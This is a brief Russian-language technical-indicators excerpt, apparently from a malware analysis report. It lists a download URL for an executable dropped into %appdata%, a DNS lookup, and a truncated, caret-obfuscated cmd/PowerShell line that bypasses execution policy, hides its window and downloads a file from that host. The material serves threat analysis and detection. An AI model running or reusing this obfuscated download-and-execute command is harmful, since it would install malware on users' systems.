Техническая информация
- http://wodkwkkwiiej81.com/ttt/2002.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^E^r^S^heL^L^.ex^e ^-^E^x^eC^u^TIONp^OLiCy^ BYP^aSs -N^OPrO^fIlE ^-wi^n^DoW^S^TylE^ hIdD^e^N (neW^-^Ob^JE^CT^ sy^STe^M.NeT.^wEbCl^iEN^T).dow^nLoadF^ILe(^'http://wo...
- DNS ASK wo####kwiiej81.com
- '<SYSTEM32>\cmd.exe' /c "pOw^E^r^S^heL^L^.ex^e ^-^E^x^eC^u^TIONp^OLiCy^ BYP^aSs -N^OPrO^fIlE ^-wi^n^DoW^S^TylE^ hIdD^e^N (neW^-^Ob^JE^CT^ sy^STe^M.NeT.^wEbCl^iEN^T).dow^nLoadF^ILe(^'http://wo...' (со скрытым окном)